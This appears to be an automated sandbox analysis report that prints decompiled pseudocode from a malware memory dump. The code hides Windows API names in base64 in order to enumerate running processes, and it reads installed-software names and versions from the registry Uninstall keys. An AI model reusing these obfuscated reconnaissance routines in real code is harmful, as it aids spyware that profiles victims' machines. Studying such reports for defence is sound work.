                                                                                                                                                                                              0x00416bae
                                                                                                                                                                                              0x00416bb4
                                                                                                                                                                                              0x00416bba
                                                                                                                                                                                              0x00416bc0
                                                                                                                                                                                              0x00416bc6
                                                                                                                                                                                              0x00416bcc
                                                                                                                                                                                              0x00416bcf
                                                                                                                                                                                              0x00416bd2
                                                                                                                                                                                              0x00416be0
                                                                                                                                                                                              0x00416bee
                                                                                                                                                                                              0x00416bf9
                                                                                                                                                                                              0x00416c0f
                                                                                                                                                                                              0x00416c1c
                                                                                                                                                                                              0x00416c27
                                                                                                                                                                                              0x00416c3d
                                                                                                                                                                                              0x00416c4a
                                                                                                                                                                                              0x00416c55
                                                                                                                                                                                              0x00416c66
                                                                                                                                                                                              0x00416c82
                                                                                                                                                                                              0x00416c87
                                                                                                                                                                                              0x00416c92
                                                                                                                                                                                              0x00416c97
                                                                                                                                                                                              0x00416c9d
                                                                                                                                                                                              0x00416cad
                                                                                                                                                                                              0x00416cae
                                                                                                                                                                                              0x00416cb3
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416cbe
                                                                                                                                                                                              0x00416ccd
                                                                                                                                                                                              0x00416cd8
                                                                                                                                                                                              0x00416cee
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cfb
                                                                                                                                                                                              0x00416d0f
                                                                                                                                                                                              0x00416d1c
                                                                                                                                                                                              0x00416d1d
                                                                                                                                                                                              0x00416d20
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416d25
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d36
                                                                                                                                                                                              0x00416d39
                                                                                                                                                                                              0x00416d3c
                                                                                                                                                                                              0x00416d3f
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d4d
                                                                                                                                                                                              0x00416d50
                                                                                                                                                                                              0x00416d52
                                                                                                                                                                                              0x00416d53
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d5e
                                                                                                                                                                                              0x00416d62
                                                                                                                                                                                              0x00416d68
                                                                                                                                                                                              0x00416d6b
                                                                                                                                                                                              0x00416d6f
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d75
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d79
                                                                                                                                                                                              0x00416d82
                                                                                                                                                                                              0x00416d89
                                                                                                                                                                                              0x00416d8d
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d97
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                              • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416B90, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				void* _t138;
				void* _t142;
				void* _t170;
				signed int _t171;
				void* _t172;
				intOrPtr* _t175;
				signed int _t184;
				intOrPtr* _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t215;
				intOrPtr _t217;
				signed int _t230;
				intOrPtr* _t240;
				signed int _t241;
				signed int _t243;
				void* _t244;
				void* _t245;
				void* _t247;
				intOrPtr _t248;

				_t239 = __esi;
				_t109 = __eax | 0x5500000a;
				_t246 = _t247;
				_t248 = _t247 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t109;
				 *[fs:eax] = _t248;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t114 = E00403990(_v588);
				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
				_t120 = E00403990(_v592);
				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
				_t126 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
				E004034E4(_v16);
				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
				if(_t194 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t194);
					if( *_t236() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t184 = E004045EC(_v8);
							_t244 =  &_v584;
							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
							_t248 = _t248 + 0x10;
							_t236 = _t244 + 0x116;
							_t240 = _t240;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t194);
						} while ( *_t240() != 0);
					}
					_t175 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t175))(_t194);
				}
				_t138 = E004045EC(_v8) - 1;
				if(_t138 >= 0) {
					_v28 = _t138 + 1;
					_t196 = 0;
					do {
						_v17 = 1;
						_t170 = E004045EC(_v8) - 1;
						if(_t170 >= 0) {
							_t172 = _t170 + 1;
							_t230 = 0;
							do {
								_t43 = _t196 * 0x8b * 4; // 0x0
								_t243 = _t230 * 0x8b;
								_t236 = _v8;
								_t47 = _t243 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t230 = _t230 + 1;
								_t172 = _t172 - 1;
							} while (_t172 != 0);
						}
						_t171 = _t196 * 0x8b;
						_t52 = _t171 * 4; // 0x0
						_t56 = _t171 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
						}
						_t196 = _t196 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t142 = E004045EC(_v8) - 1;
				if(_t142 >= 0) {
					_v28 = _t142 + 1;
					_t195 = 0;
					do {
						_t241 = _t195 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
							_t75 = _t241 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t241 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t241 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t195 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t195 = _t195 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t217 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t217);
			}










































                                                                                                                                                                                              0x00416b90
                                                                                                                                                                                              0x00416b90
                                                                                                                                                                                              0x00416b95
                                                                                                                                                                                              0x00416b97
                                                                                                                                                                                              0x00416ba2
                                                                                                                                                                                              0x00416ba8
                                                                                                                                                                                              0x00416bae
                                                                                                                                                                                              0x00416bb4
                                                                                                                                                                                              0x00416bba
                                                                                                                                                                                              0x00416bc0
                                                                                                                                                                                              0x00416bc6
                                                                                                                                                                                              0x00416bcc
                                                                                                                                                                                              0x00416bcf
                                                                                                                                                                                              0x00416bd2
                                                                                                                                                                                              0x00416be0
                                                                                                                                                                                              0x00416bee
                                                                                                                                                                                              0x00416bf9
                                                                                                                                                                                              0x00416c0f
                                                                                                                                                                                              0x00416c1c
                                                                                                                                                                                              0x00416c27
                                                                                                                                                                                              0x00416c3d
                                                                                                                                                                                              0x00416c4a
                                                                                                                                                                                              0x00416c55
                                                                                                                                                                                              0x00416c66
                                                                                                                                                                                              0x00416c82
                                                                                                                                                                                              0x00416c87
                                                                                                                                                                                              0x00416c92
                                                                                                                                                                                              0x00416c97
                                                                                                                                                                                              0x00416c9d
                                                                                                                                                                                              0x00416cad
                                                                                                                                                                                              0x00416cae
                                                                                                                                                                                              0x00416cb3
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416cbe
                                                                                                                                                                                              0x00416ccd
                                                                                                                                                                                              0x00416cd8
                                                                                                                                                                                              0x00416cee
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cfb
                                                                                                                                                                                              0x00416d0f
                                                                                                                                                                                              0x00416d1c
                                                                                                                                                                                              0x00416d1d
                                                                                                                                                                                              0x00416d20
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416d25
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d36
                                                                                                                                                                                              0x00416d39
                                                                                                                                                                                              0x00416d3c
                                                                                                                                                                                              0x00416d3f
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d4d
                                                                                                                                                                                              0x00416d50
                                                                                                                                                                                              0x00416d52
                                                                                                                                                                                              0x00416d53
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d5e
                                                                                                                                                                                              0x00416d62
                                                                                                                                                                                              0x00416d68
                                                                                                                                                                                              0x00416d6b
                                                                                                                                                                                              0x00416d6f
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d75
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d79
                                                                                                                                                                                              0x00416d82
                                                                                                                                                                                              0x00416d89
                                                                                                                                                                                              0x00416d8d
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d97
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                              • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                              • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00415F30, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                              			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v1009;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				void* _t123;
				void* _t144;
				void* _t178;
				void* _t199;
				intOrPtr* _t262;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;
				intOrPtr _t318;
				char* _t329;
				int _t331;
				int _t332;
				intOrPtr _t334;
				intOrPtr _t335;

				_t334 = _t335;
				_t263 = 0x8f;
				do {
					_push(0);
					_push(0);
					_t263 = _t263 - 1;
				} while (_t263 != 0);
				_t262 = __eax;
				_t329 =  &_v1009;
				_push(_t334);
				_push(0x416452);
				_push( *[fs:eax]);
				 *[fs:eax] = _t335;
				E004034E4(__eax);
				_t331 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1024,  *_t262);
					_push(_v1024);
					_push(0);
					_push( &_v1028);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
					E00403C98( &_v1032, E00403990(_v1036));
					_push(_v1032);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
					_push( &_v1044);
					E00403748( &_v1048, 0x3e9, _t329);
					_pop(_t123);
					E00403798(_t123, _v1048);
					E00403C98( &_v1040, E00403990(_v1044));
					_pop(_t265);
					E00407500(0x80000002, _t262, _t265, _v1040);
					_push(_v1028);
					_push(0x416528);
					_push(0);
					_push( &_v1052);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
					E00403C98( &_v1056, E00403990(_v1060));
					_push(_v1056);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
					_push( &_v1068);
					E00403748( &_v1072, 0x3e9, _t329);
					_pop(_t144);
					E00403798(_t144, _v1072);
					E00403C98( &_v1064, E00403990(_v1068));
					_pop(_t267);
					E00407500(0x80000002, _t262, _t267, _v1064);
					_push(_v1052);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1020);
					_t331 = _t331 + 1;
				}
				_t332 = 0;
				E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
					E00403D2C( &_v1084,  *_t262);
					_push(_v1084);
					_push(0);
					_push( &_v1088);
					E00406984("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
					E00403C98( &_v1092, E00403990(_v1096));
					_push(_v1092);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
					_push( &_v1104);
					E00403748( &_v1108, 0x3e9, _t329);
					_pop(_t178);
					E00403798(_t178, _v1108);
					E00403C98( &_v1100, E00403990(_v1104));
					_pop(_t269);
					E00407500(0x80000001, _t262, _t269, _v1100);
					_push(_v1088);
					_push(0x416528);
					_push(0);
					_push( &_v1112);
					E00406984("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
					E00403C98( &_v1116, E00403990(_v1120));
					_push(_v1116);
					E00406984("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
					_push( &_v1128);
					E00403748( &_v1132, 0x3e9, _t329);
					_pop(_t199);
					E00403798(_t199, _v1132);
					E00403C98( &_v1124, E00403990(_v1128));
					_pop(_t271);
					E00407500(0x80000001, _t262, _t271, _v1124);
					_push(_v1112);
					_push(")");
					E00403E1C();
					E0040377C(_t262, _v1080);
					_t332 = _t332 + 1;
				}
				E00403D2C( &_v1140,  *_t262);
				E004070BC(_v1140, _t262, 0x41655c, L"()\r\n",  &_v1136);
				E0040377C(_t262, _v1136);
				E00403D2C( &_v1148,  *_t262);
				E004070BC(_v1148, _t262, 0x41655c, L"\r\n\r\n",  &_v1144);
				E0040377C(_t262, _v1144);
				_pop(_t318);
				 *[fs:eax] = _t318;
				_push(E0041645C);
				E00403B98( &_v1148, 4);
				E00403508( &_v1132, 2);
				E00403B80( &_v1124);
				E004034E4( &_v1120);
				E00403B98( &_v1116, 2);
				E00403508( &_v1108, 2);
				E00403B80( &_v1100);
				E004034E4( &_v1096);
				E00403B98( &_v1092, 4);
				E00403508( &_v1076, 3);
				E00403B80( &_v1064);
				E004034E4( &_v1060);
				E00403B98( &_v1056, 2);
				E00403508( &_v1048, 2);
				E00403B80( &_v1040);
				E004034E4( &_v1036);
				E00403B98( &_v1032, 4);
				return E004034E4( &_v1016);
			}























































                                                                                                                                                                                              0x00415f31
                                                                                                                                                                                              0x00415f33
                                                                                                                                                                                              0x00415f38
                                                                                                                                                                                              0x00415f38
                                                                                                                                                                                              0x00415f3a
                                                                                                                                                                                              0x00415f3c
                                                                                                                                                                                              0x00415f3c
                                                                                                                                                                                              0x00415f42
                                                                                                                                                                                              0x00415f44
                                                                                                                                                                                              0x00415f4c
                                                                                                                                                                                              0x00415f4d
                                                                                                                                                                                              0x00415f52
                                                                                                                                                                                              0x00415f55
                                                                                                                                                                                              0x00415f5a
                                                                                                                                                                                              0x00415f5f
                                                                                                                                                                                              0x00415f77
                                                                                                                                                                                              0x00415f8d
                                                                                                                                                                                              0x0041610a
                                                                                                                                                                                              0x00415f9f
                                                                                                                                                                                              0x00415fa4
                                                                                                                                                                                              0x00415faa
                                                                                                                                                                                              0x00415fb2
                                                                                                                                                                                              0x00415fbe
                                                                                                                                                                                              0x00415fd6
                                                                                                                                                                                              0x00415fe1
                                                                                                                                                                                              0x00415fed
                                                                                                                                                                                              0x00415ff8
                                                                                                                                                                                              0x00416006
                                                                                                                                                                                              0x00416011
                                                                                                                                                                                              0x00416012
                                                                                                                                                                                              0x0041602a
                                                                                                                                                                                              0x0041603a
                                                                                                                                                                                              0x0041603b
                                                                                                                                                                                              0x00416040
                                                                                                                                                                                              0x00416046
                                                                                                                                                                                              0x0041604b
                                                                                                                                                                                              0x00416053
                                                                                                                                                                                              0x0041605f
                                                                                                                                                                                              0x00416077
                                                                                                                                                                                              0x00416082
                                                                                                                                                                                              0x0041608e
                                                                                                                                                                                              0x00416099
                                                                                                                                                                                              0x004160a7
                                                                                                                                                                                              0x004160b2
                                                                                                                                                                                              0x004160b3
                                                                                                                                                                                              0x004160cb
                                                                                                                                                                                              0x004160db
                                                                                                                                                                                              0x004160dc
                                                                                                                                                                                              0x004160e1
                                                                                                                                                                                              0x004160e7
                                                                                                                                                                                              0x004160f7
                                                                                                                                                                                              0x00416104
                                                                                                                                                                                              0x00416109
                                                                                                                                                                                              0x00416109
                                                                                                                                                                                              0x00416122
                                                                                                                                                                                              0x0041613a
                                                                                                                                                                                              0x00416150
                                                                                                                                                                                              0x004162cd
                                                                                                                                                                                              0x00416162
                                                                                                                                                                                              0x00416167
                                                                                                                                                                                              0x0041616d
                                                                                                                                                                                              0x00416175
                                                                                                                                                                                              0x00416181
                                                                                                                                                                                              0x00416199
                                                                                                                                                                                              0x004161a4
                                                                                                                                                                                              0x004161b0
                                                                                                                                                                                              0x004161bb
                                                                                                                                                                                              0x004161c9
                                                                                                                                                                                              0x004161d4
                                                                                                                                                                                              0x004161d5
                                                                                                                                                                                              0x004161ed
                                                                                                                                                                                              0x004161fd
                                                                                                                                                                                              0x004161fe
                                                                                                                                                                                              0x00416203
                                                                                                                                                                                              0x00416209
                                                                                                                                                                                              0x0041620e
                                                                                                                                                                                              0x00416216
                                                                                                                                                                                              0x00416222
                                                                                                                                                                                              0x0041623a
                                                                                                                                                                                              0x00416245
                                                                                                                                                                                              0x00416251
                                                                                                                                                                                              0x0041625c
                                                                                                                                                                                              0x0041626a
                                                                                                                                                                                              0x00416275
                                                                                                                                                                                              0x00416276
                                                                                                                                                                                              0x0041628e
                                                                                                                                                                                              0x0041629e
                                                                                                                                                                                              0x0041629f
                                                                                                                                                                                              0x004162a4
                                                                                                                                                                                              0x004162aa
                                                                                                                                                                                              0x004162ba
                                                                                                                                                                                              0x004162c7
                                                                                                                                                                                              0x004162cc
                                                                                                                                                                                              0x004162cc
                                                                                                                                                                                              0x004162f4
                                                                                                                                                                                              0x00416309
                                                                                                                                                                                              0x00416316
                                                                                                                                                                                              0x0041632a
                                                                                                                                                                                              0x0041633f
                                                                                                                                                                                              0x0041634c
                                                                                                                                                                                              0x00416353
                                                                                                                                                                                              0x00416356
                                                                                                                                                                                              0x00416359
                                                                                                                                                                                              0x00416369
